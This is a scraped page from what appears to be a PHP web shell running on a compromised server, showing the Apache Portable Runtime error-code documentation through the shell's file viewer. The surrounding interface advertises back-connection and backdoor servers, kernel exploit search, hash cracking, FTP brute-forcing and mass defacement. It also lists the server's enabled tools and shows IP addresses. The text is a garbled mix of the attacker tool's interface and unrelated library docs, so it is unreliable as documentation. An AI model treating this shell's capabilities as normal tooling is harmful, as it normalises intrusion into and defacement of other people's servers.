IP Address: 80.252.133.24:443 You: 216.73.216.193
| |||||||||||||||||||
|
| ||||||||||||||||||
MySQL: ON MSSQL: OFF Oracle: OFF PostgreSQL: OFF Curl: OFF Sockets: ON Fetch: OFF Wget: ON Perl: ON | |||||||||||||||||||
Disabled Functions: pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority, | |||||||||||||||||||
[ System Info ]
[ Processes ]
[ SQL Manager ]
[ Eval ]
[ Encoder ]
[ Mailer ]
[ Back Connection ]
[ Backdoor Server ]
[ Kernel Exploit Search ]
[ MD5 Decrypter ]
[ Reverse IP ]
[ Kill Shell ]
[ FTP Brute-Force ] |
|||||||||||||||||||
| |||||||||||||||||||
/ usr/ share/ doc/ libapr1-dev/ html/ - drwxr-xr-x |
Viewing file:
Select action/file-type:
Define Documentation
Fold a platform specific error into an apr_status_t code.
Fold a platform specific error into an apr_status_t code.
Return the last socket error, folded into apr_status_t, on all platforms
APR_OS_ERRSPACE_SIZE is the maximum number of errors you can fit into one of the error/status ranges below -- except for APR_OS_START_USERERR, which see.
Value:
(APR_OS_START_USERERR \ + (APR_OS_ERRSPACE_SIZE * 10)) APR_OS_START_CANONERR is where APR versions of errno values are defined on systems which don't have the corresponding errno.
APR_OS_START_EAIERR folds EAI_ error codes from getaddrinfo() into apr_status_t values.
APR_OS_START_ERROR is where the APR specific error values start.
APR_OS_START_STATUS is where the APR specific status codes start.
APR_OS_START_SYSERR folds platform-specific system error values into apr_status_t values.
APR_OS_START_USEERR is obsolete, defined for compatibility only. Use APR_OS_START_USERERR instead.
APR_OS_START_USERERR are reserved for applications that use APR that layer their own error codes along with APR's. Note that the error immediately following this one is set ten times farther away than usual, so that users of apr have a lot of room in which to declare custom error codes. In general applications should try and create unique error codes. To try and assist in finding suitable ranges of numbers to use, the following ranges are known to be used by the listed applications. If your application defines error codes please advise the range of numbers it uses to dev@apr.apache.org for inclusion in this list. Ranges shown are in relation to APR_OS_START_USERERR Subversion - Defined ranges, of less than 100, at intervals of 5000 starting at an offset of 5000, e.g. +5000 to 5100, +10000 to 10100
Reset the last socket error, unfolded from an apr_status_t
Reset the last platform error, unfolded from an apr_status_t, on some platforms
no error.
APR_UTIL_ERRSPACE_SIZE is the size of the space that is reserved for use within apr-util. This space is reserved above that used by APR internally.
Value:
APR_UTIL_START_STATUS is where APR-Util starts defining it's status codes. Typedef Documentation
Type for specifying an error or status code. Function Documentation
Return a human readable string describing the specified error.
Generated on Sun May 22 2011 14:03:03 for Apache Portable Runtime by ![]() |
Command: | |
Quick Commands: | |
Upload: | |
PHP Filesystem: |
<@ Ú |
Search File: | |
Create File: | |
View File: | |
Mass Defacement: |